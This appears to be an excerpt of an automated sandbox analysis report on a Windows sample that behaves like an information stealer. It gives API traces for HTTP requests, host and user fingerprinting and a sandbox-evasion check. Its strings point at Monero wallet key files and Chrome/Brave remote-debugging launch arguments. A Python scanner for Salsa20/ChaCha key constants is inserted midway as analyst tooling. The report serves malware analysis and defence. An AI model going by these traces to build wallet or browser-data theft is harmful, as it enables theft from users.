                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CrackInternetlstrlen
                                  • String ID: <
                                  • API String ID: 1274457161-4251816714
                                  • Opcode ID: 8b71f2b9479228e7c6d0dfa9fd434db7ddcf3f534c89ec38d0fde2aead3c03f6
                                  • Instruction ID: 7a7220a69004ef130e9c4908e23238d49b3c738d06674854725a280f48eb9486
                                  • Opcode Fuzzy Hash: 8b71f2b9479228e7c6d0dfa9fd434db7ddcf3f534c89ec38d0fde2aead3c03f6
                                  • Instruction Fuzzy Hash: 89215EB1D01208ABDF14DFA4EC4AADE7B75FB04320F108625F915A72D0EB706A09CB81

                                  APIs
                                    • Part of subcall function 0071AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0071AAF6
                                    • Part of subcall function 007062D0: InternetOpenA.WININET(00720DFF,00000001,00000000,00000000,00000000), ref: 00706331
                                    • Part of subcall function 007062D0: StrCmpCA.SHLWAPI(?,011DE920), ref: 00706353
                                    • Part of subcall function 007062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00706385
                                    • Part of subcall function 007062D0: HttpOpenRequestA.WININET(00000000,GET,?,011DE3B0,00000000,00000000,00400100,00000000), ref: 007063D5
                                    • Part of subcall function 007062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0070640F
                                    • Part of subcall function 007062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00706421
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00715478
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                  • String ID: ERROR$ERROR
                                  • API String ID: 3287882509-2579291623
                                  • Opcode ID: de19c2b9b1c2b96b054744568cb79f54790598af1a4dcb8fbd4ab8d0fa1ff5e4
                                  • Instruction ID: 6aabedfc0bb07855cf51235ce73ce8127a7a196745b991e9e2a10ae326532524
                                  • Opcode Fuzzy Hash: de19c2b9b1c2b96b054744568cb79f54790598af1a4dcb8fbd4ab8d0fa1ff5e4
                                  • Instruction Fuzzy Hash: 9C115470A01148EBCB14FFA8EC669EC7339AF50350F404554F91A570D2EF386B84C751
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717AA0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00717AA7
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00717ABF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: ea1d405090b636e60ab3cc32ee8e3da24a6286099d14b62f158e6c5db972a47e
                                  • Instruction ID: d8d64dbe3642fc3f619f17dce1d43898baaee3ed1da73a1d9056b95043e31950
                                  • Opcode Fuzzy Hash: ea1d405090b636e60ab3cc32ee8e3da24a6286099d14b62f158e6c5db972a47e
                                  • Instruction Fuzzy Hash: A50186B194C259ABC714CF9CDD45BAEFBB8FB04711F10411AF615E22C0D7785A40CBA1
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0070112B
                                  • VirtualAllocExNuma.KERNEL32(00000000), ref: 00701132
                                  • ExitProcess.KERNEL32 ref: 00701143
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$AllocCurrentExitNumaVirtual
                                  • String ID:
                                  • API String ID: 1103761159-0
                                  • Opcode ID: 24cf7349c5dd2ae22fc4254b50d3daf19d4c2fddc6026f3453df12220ec2a24e
                                  • Instruction ID: f26000a1c5a6e788cdc2817675c9b4aa95a3fb46a1e500b7c5a1ec84997b3011
                                  • Opcode Fuzzy Hash: 24cf7349c5dd2ae22fc4254b50d3daf19d4c2fddc6026f3453df12220ec2a24e
                                  • Instruction Fuzzy Hash: 19E0E6709DE30CFBE7105BD09D0EB4DB7689B04B15F500155F709761D0D6B525805659
                                  APIs
                                  • VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00C493D2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ProtectVirtual
                                  • String ID: V
                                  • API String ID: 544645111-1342839628
                                  • Opcode ID: eaa0071282edcbca3fc55d7b39f43fa9c831015e634596b6ebed21bbdfb66e43
                                  • Instruction ID: fa7396b0a6c741024ac515af8ea62334131fefdd52ecf4ddc09b6dcb832ba581
                                  • Opcode Fuzzy Hash: eaa0071282edcbca3fc55d7b39f43fa9c831015e634596b6ebed21bbdfb66e43
                                  • Instruction Fuzzy Hash: CC113872418129DFDF059E64DC406AF37E4EF16310F150119EE82A7991DA336D248BDB
                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 007010B3
                                  • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 007010F7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000086E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.00000000009D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.00000000009EA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C54000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C7A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C81000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137814810.0000000000C90000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138043905.0000000000C91000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138147631.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2138161384.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_700000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Virtual$AllocFree
                                  • String ID:
                                  • API String ID: 2087232378-0
                                  • Opcode ID: b3b7bcda0f03f953944e1589f1eb6d4bebd754593ce4bd63dbdd1310c9e57ba9
                                  • Instruction ID: 1f9ea0d1ab4de9e36ed9f16eb030c5dae7b7ee3584b8c2f21affb57f15098c78
                                  • Instruction Fuzzy Hash: 17F0E2B1686208FBE7149AE8AC59FAEB7D8E705B04F700548F540E3280D571AE40DAA0
                                  APIs
                                    • Part of subcall function 00717A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00717AA0
                                    • Part of subcall function 00717A70: RtlAllocateHeap.NTDLL(00000000), ref: 00717AA7
                                    • Part of subcall function 00717A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00717ABF
                                    • Part of subcall function 007179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,007011B7), ref: 00717A10
                                    • Part of subcall function 007179E0: RtlAllocateHeap.NTDLL(00000000), ref: 00717A17
                                    • Part of subcall function 007179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00717A2F
                                  • ExitProcess.KERNEL32 ref: 007011C6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: Heap$Process$AllocateName$ComputerExitUser
                                  • String ID:
                                  • API String ID: 3550813701-0
                                  • Opcode ID: a9a9d8e43585d0a6c3f42bd3ac8367e762ac7d5d4dcfb4fc7853a9646854faab
                                  • Instruction ID: 27d18c3d394e353203f64f0d38aa067f1b3cca316a9822e0ba486f680ff45c53
                                  • Instruction Fuzzy Hash: 0AE0ECB69AC205D2CB1473B9AC0AB5A739C5B1530AF000915F90892182FE29F8809165
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00720B32,00720B2F,00000000,?,?,?,00721450,00720B2E), ref: 0070BEC5
                                  • StrCmpCA.SHLWAPI(?,00721454), ref: 0070BF33
                                  • StrCmpCA.SHLWAPI(?,00721458), ref: 0070BF49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070C8A9
                                  • FindClose.KERNEL32(000000FF), ref: 0070C8BB
                                  Strings
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0070C3B2
                                  • Google Chrome, xrefs: 0070C6F8
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0070C534
                                  • Preferences, xrefs: 0070C104
                                  • --remote-debugging-port=9229 --profile-directory=", xrefs: 0070C495
                                  • Brave, xrefs: 0070C0E8
                                  • \Brave\Preferences, xrefs: 0070C1C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 3334442632-1869280968
                                  • Opcode ID: 4eed5d61797cbbff0ed125ebef4da560f4a8e9b9d20caf1844bb7f1746f2e7e6
                                  • Instruction ID: f3a60d048ae39f1ef5e98e3f0eec519fbb52a531b890b252baed3dde01f0373a
                                  • Instruction Fuzzy Hash: 895288B2611104EBCB24FB74DD9AEEE737DAF54310F404699B50A660D1EE385B88CF62
                                  APIs
                                  • wsprintfA.USER32 ref: 00713B1C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00713B33
                                  • lstrcat.KERNEL32(?,?), ref: 00713B85
                                  • StrCmpCA.SHLWAPI(?,00720F58), ref: 00713B97
                                  • StrCmpCA.SHLWAPI(?,00720F5C), ref: 00713BAD
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00713EB7
                                  • FindClose.KERNEL32(000000FF), ref: 00713ECC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                  • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                  • API String ID: 1125553467-2524465048
                                  • Opcode ID: 46f298eb811da2d16384f9a3c58d4561453db0b7143e787f47dfc163d71ec74b
                                  • Instruction ID: 000c0ff71eb694014164d3a0f2537f03555e56a0b0c9b90588371eeb3ee40fca
                                  • Instruction Fuzzy Hash: CDA152B1A542189BDB34DFA8DC89FEAB379AB44300F044589B61D96181EB749BC8CF61
                                  APIs
                                  • wsprintfA.USER32 ref: 00714B7C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00714B93
                                  • StrCmpCA.SHLWAPI(?,00720FC4), ref: 00714BC1
                                  • StrCmpCA.SHLWAPI(?,00720FC8), ref: 00714BD7
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00714DCD
                                  • FindClose.KERNEL32(000000FF), ref: 00714DE2
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s$%s\%s$%s\*
                                  • API String ID: 180737720-445461498
                                  • Opcode ID: 28107bc982fb0f5fa405551748eaca12f9ea79435570ac938495cece0c4a7548
                                  • Instruction ID: 93802e4b824315c2ba57a976cf0db7eef3f203c3dee6cc3e3eb12672d9442c9e
                                  • Instruction Fuzzy Hash: 356169B1554118ABCB20EBE4ED49FEAB37CBB48701F004689F60996181FB749BC4CFA1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 007147D0
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 007147D7
                                  • wsprintfA.USER32 ref: 007147F6
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0071480D
                                  • StrCmpCA.SHLWAPI(?,00720FAC), ref: 0071483B
                                  • StrCmpCA.SHLWAPI(?,00720FB0), ref: 00714851
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007148DB
                                  • FindClose.KERNEL32(000000FF), ref: 007148F0
                                  • lstrcat.KERNEL32(?,011DE880), ref: 00714915
                                  • lstrcat.KERNEL32(?,011DD848), ref: 00714928
                                  • lstrlen.KERNEL32(?), ref: 00714935
                                  • lstrlen.KERNEL32(?), ref: 00714946
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 671575355-2848263008
                                  • Opcode ID: 66aa39627246daf70b4cf443dcfa12bbd78e0b932ebb8738b99ff3e2f31ee98a
                                  • Instruction ID: ee79c8f45bdc7470972aee743174a08b86eb28ffbb1ffc2f4158d4c049b323ac
                                  • Instruction Fuzzy Hash: 6B51ACB1558218ABCB20EBB4DC59FEDB37CAB58300F404689B659960D0EB74DBC4DF91
                                  APIs
                                  • wsprintfA.USER32 ref: 00714113
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0071412A
                                  • StrCmpCA.SHLWAPI(?,00720F94), ref: 00714158
                                  • StrCmpCA.SHLWAPI(?,00720F98), ref: 0071416E
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 007142BC
                                  • FindClose.KERNEL32(000000FF), ref: 007142D1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 180737720-4073750446
                                  • Opcode ID: ae125592b8d726711790ca0524b51cc484cc7df92cd84233c607fa613005d72d
                                  • Instruction ID: 2e7f5ef70ed3fe1c971060074078ae0f3a7c40c70304a5cd39dbcf7c495b56ad
                                  • Instruction Fuzzy Hash: 595199B1554118EBCB24EBB4DD49EEAB37CBB48300F4046C9B61996090EB74ABC5DF90
                                  APIs
                                  • wsprintfA.USER32 ref: 0070EE3E
                                  • FindFirstFileA.KERNEL32(?,?), ref: 0070EE55
                                  • StrCmpCA.SHLWAPI(?,00721630), ref: 0070EEAB
                                  • StrCmpCA.SHLWAPI(?,00721634), ref: 0070EEC1
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070F3AE
                                  • FindClose.KERNEL32(000000FF), ref: 0070F3C3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID: Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 180737720-1013718255
                                  • Opcode ID: e6afd0c00de49ddd78f828498902a5e8dcb3f4f3c3e2c94339dbf97d037c6af4
                                  • Instruction ID: e695045663102bf36dcd1a3ef03d9858fdaab471a21d59026e575401aec77c60
                                  • Instruction Fuzzy Hash: 4DE125B1916118EADB24FB64DC66EEE733DAF54310F4045D9B40A620D2EE386BC9CF61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: cf934d431d458055dc0d692c7079a176ca74b8e1c64f2b9da4c3666c06620493
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: 37E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
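The String ID of this function is the four little-endian dwords of "expand 32-byte k" ("expa", "nd 3", "2-by", "te k"), the 256-bit key-setup constant shared by Salsa20 and ChaCha20; the fragments appear separately because compilers emit the state initialisation as four `mov dword, imm32` instructions. The report alone does not say which of the two ciphers the sample implements, so the scanner below handles both layouts. This is an added example for analysts working from the memory dumps, not code from the report or from the sample; the dump it scans is constructed inline.

```python
"""Locate Salsa20/ChaCha key-setup constants in a memory dump and recover the key.

Added example, not part of the Joe Sandbox report or the analysed sample.
"""
import struct
from typing import Dict, List, Tuple

# "expand 32-byte k" is the 256-bit-key constant (sigma) shared by Salsa20 and
# ChaCha20. Its four little-endian dwords are the fragments in the report's
# String ID: "expa" = 0x61707865, "nd 3", "2-by", "te k".
SIGMA = b"expand 32-byte k"
SIGMA_WORDS: Tuple[int, ...] = struct.unpack("<4I", SIGMA)

# Position of the four constant words in the 16-dword state, and of the key words.
LAYOUTS: Dict[str, Tuple[int, ...]] = {
    "chacha": (0, 1, 2, 3),     # key in words 4..11, counter 12, nonce 13..15
    "salsa20": (0, 5, 10, 15),  # key in words 1..4 and 11..14
}
KEY_WORDS: Dict[str, Tuple[int, ...]] = {
    "chacha": tuple(range(4, 12)),
    "salsa20": (1, 2, 3, 4, 11, 12, 13, 14),
}


def find_all(buf: bytes, needle: bytes) -> List[int]:
    """All offsets of needle in buf, overlapping matches included."""
    hits, i = [], buf.find(needle)
    while i != -1:
        hits.append(i)
        i = buf.find(needle, i + 1)
    return hits


def find_sigma_fragments(buf: bytes) -> Dict[str, List[int]]:
    """Offsets of each 4-byte sigma word on its own: this is how the constant
    shows up inside code (immediate operands) rather than as one 16-byte string."""
    return {SIGMA[i:i + 4].decode(): find_all(buf, SIGMA[i:i + 4]) for i in range(0, 16, 4)}


def find_state_blocks(buf: bytes) -> List[Tuple[str, int]]:
    """(layout, offset) of every 64-byte window whose constant words sit in ChaCha
    or Salsa20 position. A contiguous .rdata literal also reports as 'chacha';
    check that the recovered key words look random before trusting such a hit."""
    found = []
    for off in find_all(buf, SIGMA[:4]):
        if off + 64 > len(buf):
            continue
        words = struct.unpack_from("<16I", buf, off)
        for name, idx in LAYOUTS.items():
            if all(words[idx[k]] == SIGMA_WORDS[k] for k in range(4)):
                found.append((name, off))
    return found


def extract_key(buf: bytes, layout: str, off: int) -> bytes:
    """32-byte key from a state block reported by find_state_blocks."""
    words = struct.unpack_from("<16I", buf, off)
    return b"".join(struct.pack("<I", words[i]) for i in KEY_WORDS[layout])


def build_sample() -> bytes:
    """Constructed dump (not from the sample): a ChaCha state at offset 7, one x86
    `mov dword ptr [ebp-0x40], 0x61707865` (C7 45 C0 imm32) and a Salsa20 state."""
    key = bytes(range(32))
    chacha = SIGMA + key + struct.pack("<4I", 1, 0, 0, 0)
    salsa_words = [0] * 16
    for k, i in enumerate(LAYOUTS["salsa20"]):
        salsa_words[i] = SIGMA_WORDS[k]
    for j, i in enumerate(KEY_WORDS["salsa20"]):
        salsa_words[i] = struct.unpack_from("<I", key, 4 * j)[0]
    salsa = struct.pack("<16I", *salsa_words)
    mov_imm = bytes.fromhex("c745c0") + struct.pack("<I", SIGMA_WORDS[0])
    return b"\x00" * 7 + chacha + b"\xcc" * 9 + mov_imm + b"\x90" * 5 + salsa + b"\x00" * 3


if __name__ == "__main__":
    dump = build_sample()
    print("fragments:", find_sigma_fragments(dump))
    for layout, off in find_state_blocks(dump):
        print(f"{layout} state at 0x{off:x}, key={extract_key(dump, layout, off).hex()}")
```

Run it against the .sdmp files listed under Memory Dump Source: a scattered-fragment hit inside the 701000 image marks the key-setup routine, while a full state block in a writable region is where the expanded key lives at runtime.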
                                  APIs
                                    • Part of subcall function 0071AA50: lstrcpy.KERNEL32(00720E1A,00000000), ref: 0071AA98
                                    • Part of subcall function 0071AC30: lstrcpy.KERNEL32(00000000,?), ref: 0071AC82
                                    • Part of subcall function 0071AC30: lstrcat.KERNEL32(00000000), ref: 0071AC92
                                    • Part of subcall function 0071ACC0: lstrlen.KERNEL32(?,011D8F90,?,\Monero\wallet.keys,00720E1A), ref: 0071ACD5
                                    • Part of subcall function 0071ACC0: lstrcpy.KERNEL32(00000000), ref: 0071AD14
                                    • Part of subcall function 0071ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0071AD22
                                    • Part of subcall function 0071ABB0: lstrcpy.KERNEL32(?,00720E1A), ref: 0071AC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,007216B0,00720D97), ref: 0070F81E
                                  • StrCmpCA.SHLWAPI(?,007216B4), ref: 0070F86F
                                  • StrCmpCA.SHLWAPI(?,007216B8), ref: 0070F885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0070FBB1
                                  • FindClose.KERNEL32(000000FF), ref: 0070FBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2137632278.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                                   • Associated: 00000000.00000002.2137619503.0000000000700000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000072C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.000000000083D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2137632278.0000000000849000.00000040.00000001.01000000.00000003.sdmp
